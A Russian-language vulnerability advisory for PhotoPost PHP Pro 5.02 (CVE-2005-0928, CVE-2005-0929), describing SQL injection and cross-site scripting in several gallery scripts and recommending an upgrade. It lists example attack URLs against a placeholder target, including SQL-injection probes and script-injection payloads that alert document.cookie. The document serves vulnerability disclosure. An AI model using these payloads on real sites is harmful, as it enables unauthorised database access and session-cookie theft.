SQL-инъекция и межсайтовый скриптинг в PhotoPost PHP Pro

Дата публикации:
01.04.2005
Дата изменения:
24.03.2009
Всего просмотров:
1275
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-0928
CVE-2005-0929
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PhotoPost PHP Pro 5.x
Уязвимые версии: PhotoPost PHP Pro 5.02

Описание:
Обнаруженные уязвимость позволяют злоумышленнику произвести XSS нападение и выполнить произвольные команды в базе данных уязвимого приложения.

SQL-инъекция возможна из-за недостаточной фильтрации входных данных в сценариях 'showmembers.php' и 'showphoto.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[target]/photos/showmembers.php?sl='SQL_INJECTION

http://[target]/photos/showphoto.php?photo='SQL_ERROR

Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных в сценариях 'showgallery.php', 'showmembers.php', и 'slideshow.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/photos/showgallery.php?cat=%22%3E%3C
script%3Ealert(doc ument.cookie)%3C/script%3E

http://[target]/photos/showgallery.php?si=&sort=1&cat=2
& ppuser=&friendemail=%3d'email%40yourfriend.com')
this.value%3d''%3b&password=%22%3E%3 Cscript%3E
alert(document.cookie)%3C/script%3E

http://[target]/photos/showgallery.php?si=&sort=1&cat=501
& ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&fr iendemail=%3d'email%40yourfriend.com')
this.value%3d''%3b&password=

http://[target]/photos/showgallery.php?si=&sort=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3 E&cat=2&ppuser=
& friendemail=%3d'email%40yourfriend.com')
this.value%3d''%3b&password=

http://[target]/photos/showgallery.php?si=%22%3E%3C
script%3Ealert(document.cookie) %3C/script%3E

http://[target]/photos/showmembers.php?si=&sort=4&cat=500&
ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/photos/showmemb ers.php?si=&sort=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3E&cat=500&ppuser=

http://[target]/photos/showmembers.php?si=%22%3E%3C
script%3Ealert(document.cooki e)%3C/script%3E&
sort=4&cat=500&ppuser=

http://[target]/photos/slideshow.php?photo=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3E&
amp%3bpassword=&amp%3bsort=1&am p%3bcat=502

URL производителя: www.photopost.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Multiple Sql injection, and multiple XSS vulnerabilities in Photopost PHP Pro Photo Gallery Software

или введите имя

CAPTCHA